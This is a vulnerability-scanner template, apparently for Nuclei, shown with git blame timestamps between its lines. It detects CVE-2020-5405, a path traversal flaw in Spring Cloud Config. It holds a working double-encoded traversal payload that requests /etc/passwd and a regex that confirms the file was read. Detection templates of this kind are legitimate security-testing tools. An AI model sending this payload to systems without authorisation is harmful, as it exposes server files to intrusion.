2021-01-02 04:56:15 +00:00
id : CVE-2020-5405
2020-07-06 16:22:18 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Spring Cloud Config - Local File Inclusion
2021-06-09 12:20:56 +00:00
author : harshbothra_
2021-09-10 11:26:40 +00:00
severity : medium
2022-07-26 13:45:11 +00:00
description : Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://pivotal.io/security/cve-2020-5405
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-5405
2023-07-12 11:56:50 +00:00
cwe-id : CWE-22,CWE-23
2023-04-12 10:55:48 +00:00
epss-score : 0.00258
2023-12-12 11:07:52 +00:00
epss-percentile : 0.63361
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : vmware
product : spring_cloud_config
2023-12-05 09:50:33 +00:00
tags : cve,cve2020,lfi,springcloud,vmware
2020-07-06 16:22:18 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-07-06 16:22:18 +00:00
- method : GET
path :
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
2023-07-11 19:49:27 +00:00
2020-07-06 17:10:05 +00:00
matchers-condition : and
2020-07-06 16:22:18 +00:00
matchers :
2020-07-06 17:10:05 +00:00
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2020-07-06 17:10:05 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 4a0a00473045022100a54afc7c94f34e7d3e580c3be013a46b0c579d6da632f9e643f6c5ce3435e57e022048fcaad30b2d18835c534f35a144039d9de5afc3cdea7bdb7101d831bd92de38:922c64590222798bb761d5b6d8e72950